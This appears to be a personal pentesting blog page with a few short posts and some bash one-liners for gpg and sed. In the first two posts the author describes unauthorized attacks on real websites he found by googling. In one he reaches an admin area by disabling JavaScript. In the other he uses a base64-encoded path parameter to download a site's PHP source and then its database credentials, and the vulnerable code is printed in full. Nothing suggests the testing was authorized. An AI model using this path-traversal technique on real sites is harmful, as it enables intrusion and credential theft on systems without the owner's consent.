Skip to content

Pentesting reports

Notes on penetration testing journeys

Author: trouble

Keep JavaScript disabled, and strange things could happen

Posted on 2019/02/01 by trouble

Have you ever surfed the web with JavaScript disabled? It is another web, faster for sure. It is a must if you’re surfing the Tor network. It is a strong suggestion even when surfing the clearnet. JavaScript can expose some personal info about us, it is a fact.

Well long story short, some days ago I was looking for login forms to bypass and as usual I was browsing with JavaScript disabled. I’ve opened the next google result and boom! The admin area was in front of me! Wait… where is the login form? I’ve tried to enable JavaScript and… There is the login form. So, disabling JS again would let me enter the admin area. The easiest exploit ever done.

 

Posted in Bypass loginTagged bypass login, javascript, javascript disabled, js, no javascript, no js

Arbitrary file download: an example

Posted on 2019/02/01 by trouble
Pentesting Journeys

I found a lot of sites with urls containing a get variable whose value is a physical path and a file name. I’m not sure why a web developer would ever implement a horrible thing like that but… Still they do. If you want to know more about this kind of vulnerability head to mitre.org

Oh and even worse, some developers think that encoding that relative path with base64 would keep away hackers / pentesters. My article is an example of this kind.

So the other day I was googling around when I found a site where a user can download PDF documents, but the strange thing is that the link to download the file is as follow:

http://foobar.com/down.php?download=dXBsb2FkL2ZpbGVzLzc0OC1pbnN0cnVjdGlvbnMucGRm

Let’s decode that string “dXBsb2FkL2Z…” using base64decode.org :

upload/files/748-instructions.pdf

Bingo! A relative path with a file name. Let’s try to encode the relative path to the file down.php itself:

http://foobar.com/down.php?download=ZG93bi5waHA=

The response is what I was expecting, the source code of down.php:

<?php
session_start();

if ($_GET['download'])
{
    $download = $_GET['download'];
    $file = base64_decode($download);
    $file_name = basename($file);
    $file_name = substr($file_name,11);

    if (file_exists($file))
    {
        header("Expires: Mon,  10 Dec 2001 08:00:00 GMT");
        header("Last-Modified: ".gmdate("D,  d M Y H:i:s")." GMT");
        header('Content-Type: '.content_type($file_name));
        header('Content-Disposition: attachment; filename="'.$file_name.'"');
        header('Content-Length: '.filesize($file).'; ');
        readfile($file);
    }
    else
    {
        //header("Location: " . $_SERVER['HTTP_REFERER']);
        //header("HTTP/1.0 404 Not Found");
        echo "<p>File $file_name does not exist.</p>";
        die;
    }
}


function content_type($name) {
    $contenttype  = 'application/octet-stream';
    $contenttypes = array (
                            'aif'   =>  'audio/x-aiff',
                            'aifc'  =>  'audio/x-aiff',
                            'aiff'  =>  'audio/x-aiff',
                            'avi'   =>  'video/x-msvideo',
                            'bmp'   =>  'image/bmp',
                            'css'   =>  'text/css',
                            'doc'   =>  'application/msword',
                            'dvi'   =>  'application/x-dvi',
                            'dxr'   =>  'application/x-director',
                            'eml'   =>  'message/rfc822',
                            'gif'   =>  'image/gif',
                            'htm'   =>  'text/html',
                            'html'  =>  'text/html',
                            'jpe'   =>  'image/jpeg',
                            'jpeg'  =>  'image/jpeg',
                            'jpg'   =>  'image/jpeg',
                            'log'   =>  'text/plain',
                            'mid'   =>  'audio/midi',
                            'midi'  =>  'audio/midi',
                            'mov'   =>  'video/quicktime',
                            'movie' =>  'video/x-sgi-movie',
                            'mp2'   =>  'audio/mpeg',
                            'mp3'   =>  'audio/mpeg',
                            'mpe'   =>  'video/mpeg',
                            'mpeg'  =>  'video/mpeg',
                            'mpg'   =>  'video/mpeg',
                            'mpga'  =>  'audio/mpeg',
                            'oda'   =>  'application/oda',
                            'pdf'   =>  'application/pdf',
                            'png'   =>  'image/png',
                            'ppt'   =>  'application/vnd.ms-powerpoint',
                            'qt'    =>  'video/quicktime',
                            'ra'    =>  'audio/x-realaudio',
                            'ram'   =>  'audio/x-pn-realaudio',
                            'rm'    =>  'audio/x-pn-realaudio',
                            'rpm'   =>  'audio/x-pn-realaudio-plugin',
                            'rtf'   =>  'text/rtf',
                            'rtx'   =>  'text/richtext',
                            'rv'    =>  'video/vnd.rn-realvideo',
                            'shtml' =>  'text/html',
                            'swf'   =>  'application/x-shockwave-flash',
                            'tar'   =>  'application/x-tar',
                            'text'  =>  'text/plain',
                            'txt'   =>  'text/plain',
                            'tgz'   =>  'application/x-tar',
                            'tif'   =>  'image/tiff',
                            'tiff'  =>  'image/tiff',
                            'wav'   =>  'audio/x-wav',
                            'word'  =>  'application/msword',
                            'xht'   =>  'application/xhtml+xml',
                            'xhtml' =>  'application/xhtml+xml',
                            'xl'    =>  'application/excel',
                            'xls'   =>  'application/vnd.ms-excel',
                            'xml'   =>  'text/xml',
                            'xsl'   =>  'text/xml',
                            'zip'   =>  'application/zip'
                          );

    $name = ereg_replace("§", " ", $name);
    foreach ($contenttypes as $type_ext => $type_name) {
        if (preg_match ("/$type_ext$/i",  $name)) $contenttype = $type_name;
    }
    return $contenttype;
}
?>

The next step was to request the source code of index.php, where I found the include file containing the database credentials. End of game.

Posted in Arbitrary file downloadTagged arbitrary file download, CWE-23, Relative Path Traversal, vulnerable

PGP: encrypt file content to stdout

Posted on 2019/01/08 - 2019/01/10 by trouble
Pentesting Journeys

Sometimes I don’t simply want to encrypt files, I need to encrypt plain text only, e.g. to send it in the body of an email. I’m using PGP (Pretty Good Privacy) because it’s widely used and it can be installed on Linux, Windows and OSX machines. Well, on *nix machines the program is called GPG (Gnu Privacy Guard) but it’s the only difference. Furthermore, instead of creating To encrypt file content (not the file itself!) use this bash one-line commands:

cat PLAINFILE | gpg -a -o - -r RECIPIENT -e -

It will dump the encrypted content, additionally with ascii armature (option -a or --armor), to stdout (option -o -); therefore no data, altough encrypted, will be ever written on disk. Use this bash one-line command to decrypt pgp’ed data to stdout rather than a file.

Posted in Bash one-linersTagged bash, encrypt, gpg, pgp

PGP: decrypt file contents to stdout

Posted on 2019/01/08 - 2019/01/10 by trouble

Using the following bash one-line command, the decrypted content will be shown in stdout rather than wrote to a file:

gpg -o - -d ENCRYPTEDFILE

To encrypt file content (not the file itself) with pgp and dump the output to stdout use this bash one-line command.

Posted in Bash one-linersTagged bash, decrypt, gpg, pgp

Bash one-line command: find files and replace strings into them

Posted on 2019/01/08 - 2019/01/08 by trouble

The following bash one-line command is useful when you need to replace a string in multiple files (say, every .html file):

find . -type f -name '*.html' -exec sed -i -e 's/SEARCHTEXT/REPLACETEXT/g' {} \;
Posted in Bash one-linersTagged bash, find, sed

Posts navigation

Older posts

Music from Soundcloud

Pages

  • Manifesto
  • Get in touch

Categories

  • Arbitrary file download
  • Bash one-liners
  • Bypass login
  • PHP snippets

RSS RSS Feed from Exploit DB

  • [remote] HTTP/2 2.0 - Denial Of Service (DOS)
  • [webapps] Concrete CMS 9.4.3 - Stored XSS
  • [local] Mbed TLS 3.6.4 - Use-After-Free
  • [webapps] ELEX WooCommerce WordPress Plugin 1.4.3 - SQL Injection
  • [webapps] XWiki Platform 15.10.10 - Metasploit Module for Remote Code Execution (RCE)
  • [webapps] Casdoor 2.55.0 - Cross-Site Request Forgery (CSRF)
  • [webapps] dotCMS 25.07.02-1 - Authenticated Blind SQL Injection
  • [webapps] Tourism Management System 2.0 - Arbitrary Shell Upload
  • [remote] ClipBucket 5.5.2 Build #90 - Server-Side Request Forgery (SSRF)
  • [remote] ClipBucket 5.5.0 - Arbitrary File Upload

RSS RSS Feed from Packetstorm

RSS Rss Feed from Nist

  • CVE-2023-36409
    Microsoft Edge (Chromium-based) Information Disclosure Vulnerability
  • CVE-2023-36769
    Microsoft OneNote Spoofing Vulnerability
  • CVE-2023-47004
    Buffer Overflow vulnerability in Redis RedisGraph v.2.x through v.2.12.8 and fixed in v.2.12.9 allows an attacker to execute arbitrary code via the code logic after valid authentication.
  • CVE-2023-45556
    Cross Site Scripting vulnerability in Mybb Mybb Forums v.1.8.33 allows a local attacker to execute arbitrary code via the theme Name parameter in the theme management component.
  • CVE-2023-5605
    The URL Shortify WordPress plugin through 1.7.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)
  • CVE-2023-5601
    The WooCommerce Ninja Forms Product Add-ons WordPress plugin before 1.7.1 does not validate the file to be uploaded, allowing any unauthenticated users to upload arbitrary files to the server, leading to RCE.
  • CVE-2023-5530
    The Ninja Forms Contact Form WordPress plugin before 3.6.34 does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored XSS attacks. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JS in posts/comments etc however the vendor […]
  • CVE-2023-5771
    Proofpoint Enterprise Protection contains a stored XSS vulnerability in the AdminUI. An unauthenticated attacker can send a specially crafted email with HTML in the subject which triggers XSS when viewing quarantined messages.  This issue affects Proofpoint Enterprise Protection: from 8.20.0 before patch 4796, from 8.18.6 before patch 4795 and all other prior versions.
  • CVE-2023-4930
    The Front End PM WordPress plugin before 11.4.3 does not block listing the contents of the directories where it stores attachments to private messages, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.
  • CVE-2023-5228
    The User Registration WordPress plugin before 3.0.4.2 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).
Proudly powered by WordPress | Theme: micro, developed by DevriX.